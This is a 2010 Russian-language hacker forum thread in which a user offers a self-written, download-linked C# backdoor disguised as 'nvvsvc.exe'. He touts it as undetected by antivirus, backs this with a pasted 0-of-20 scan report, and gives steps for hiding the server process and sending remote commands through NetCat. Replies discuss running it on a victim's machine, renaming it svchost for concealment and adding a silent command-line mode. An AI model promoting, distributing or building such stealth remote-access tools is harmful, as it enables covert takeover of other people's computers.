PDA

Просмотр полной версии : Небольшой бекдор от меня..(клиент+сервер)


[ac1D]
11.05.2010, 19:19
Недавно написал бекдор для своих целей. Решил поделить, потому что:
[+] - Ничем не палится.
[+] - Весит 10кб.
[+] - Можно открыть любой порт и спрятать(будет только в процессах).
[+] - Главный поток ничем не забит -> не тормозит.
[+] - Можно конектиться к серверу сколько влезет, пока он есть в процессах.
[-] - Не пишется в автозагрузку. Могу сделать, просто с мои личные, эта цель не входила.


http://s003.radikal.ru/i203/1005/1a/905293d596b6.gif

P.S. В качестве клиента советую юзать NetCat, свой клиент написал за 5 мин, так как не хотел изобретать велосипед))

How2:
Открываем nvvsvc.exe вписываем свой порт, жмем Open, затем Hide Me, и сервер остается только в процессах.
Затем в клиенте конектимся , и отсылаем команду) И нам приходит результат ее выполнения.

[ Download this shit (http://slil.ru/29114674) ]

Хотелось бы услышать предложения по развитию этого сервера)


Report date:2010-05-12 19:15:39 (GMT 1) File name:nvvsvc.exe File size:10752 bytes MD5 hash:e662c3ebed0894f2cd018b1e5d179c2e SHA1 hash:8a0a78a31aeb4c067fb44f1288fddb0c45d07511 Detection rate: 0 on 20 (0%) Status:CLEAN AntivirusDatabaseEngineResult a-squared12/05/20105.0.0.7-Avast100331-14.8.1368-AVG271.1.1/28689.0.0.725-Avira AntiVir7.10.7.917.6.0.59-BitDefender12/05/20107.0.0.2555-ClamAV12/05/20100.96.1-Comodo34683.13.579-Dr.Web12/05/20105.0-F-PROT6201005124.5.1.85-G-Data21.1402.0.7309.847-Ikarus T312/05/20101.1.84.0-Kaspersky12/05/20109.0.0.736-McAfee31/03/20105.1.0.0-NOD3251094.0.474-Panda11/05/201010.0.3.0-Solo12/05/20109.0-2010-TrendMicro1619.120-1004-VBA3212/05/20103.12.12.2-VirusBuster
1.5.6-Zoner12/05/20100.2- Extra information File type:Executable File (EXE)Packer:Nothing foundBinder detector:Nothing foundPDF analyzer:Nothing found_http://scanner.novirusthanks.org/analysis/e662c3ebed0894f2cd018b1e5d179c2e/bnZ2c3ZjLmV4ZQ==/

phpdreamer
11.05.2010, 21:22
если не ошибаюсь, запретная тема на форуме

POS_troi
11.05.2010, 21:52
Ну его к вирусам отнести сложно, его можно например использовать в полне мирных целях

[ac1D]
11.05.2010, 21:53
Согласен, но с другой стороны он не пишется в автозагрузку, пользователь должен разрешить доступ к сети, ну и так далее)

MAQUEEN
11.05.2010, 21:59
мне вполне понравилось.... все просто.

Adio
11.05.2010, 22:12
Тс сидиш попивает чайок читая логи от ачатавцев :)))))))))))) шучю :)

ghostwizard
11.05.2010, 22:15
Console mode есть?

[ac1D]
11.05.2010, 22:18
Adio, боже мой) ты что.. Я лучше куплю загрузок.
ghostwizard, так там только и есть консолька :)

MAQUEEN
11.05.2010, 22:20
под какой .NET ?

[ac1D]
11.05.2010, 22:21
У меня framework 3.5 , на других не тестировал.

MAQUEEN
11.05.2010, 22:24
у меня тоже 3.5, но выдает ошибку.... сейчас разберемся)

[ac1D]
11.05.2010, 22:25
MAQUEEN, а на каком именно моменте?
Может это мало на что повлияет, но у меня Win 7 x64.

MAQUEEN
11.05.2010, 22:28
у ня XP.. переустановил NET, все норма) спс ище раз.

Adio
11.05.2010, 22:39
а на чем писал ?

[ac1D]
11.05.2010, 22:41
На C#.(VC# 2008)

Adio
11.05.2010, 22:42
Возьму тебя на заметку :)

MDxaker
11.05.2010, 22:44
чушь.... но за работу +

warkk
11.05.2010, 23:13
Лучше уже запустить на компе жертвы телнет.

[ac1D]
11.05.2010, 23:46
warkk,а как ты его спрячешь? + это весит 10 кб)
+ этот можно назвать svchost и все)

ghostwizard
12.05.2010, 00:24
']ghostwizard, так там только и есть консолька :)

Я имел ввиду запуск твоей утилиты с консоли, без окошка с кнопочками. Типа: "bdoor.exe /hide /port 7778"

[ac1D]
12.05.2010, 14:56
ghostwizard, это просто но это уже будет реал бекдор) и с ачата, наверное, тему снесут через 5 минут.

ZagZag
12.05.2010, 21:44
:D
Кто ж серверную часть пишет на шарпе?
Низкоуровневые девелоперы уже вымерли?

[ac1D]
12.05.2010, 22:02
Я написал что клиентскую часть плохо написал, советую NetCat, потому что велосипед изобретать не хочется как-то.

zagzag, припомню листинг.

Fantomas
30.05.2010, 14:14
Ты его случайно не на Algoritme делал?)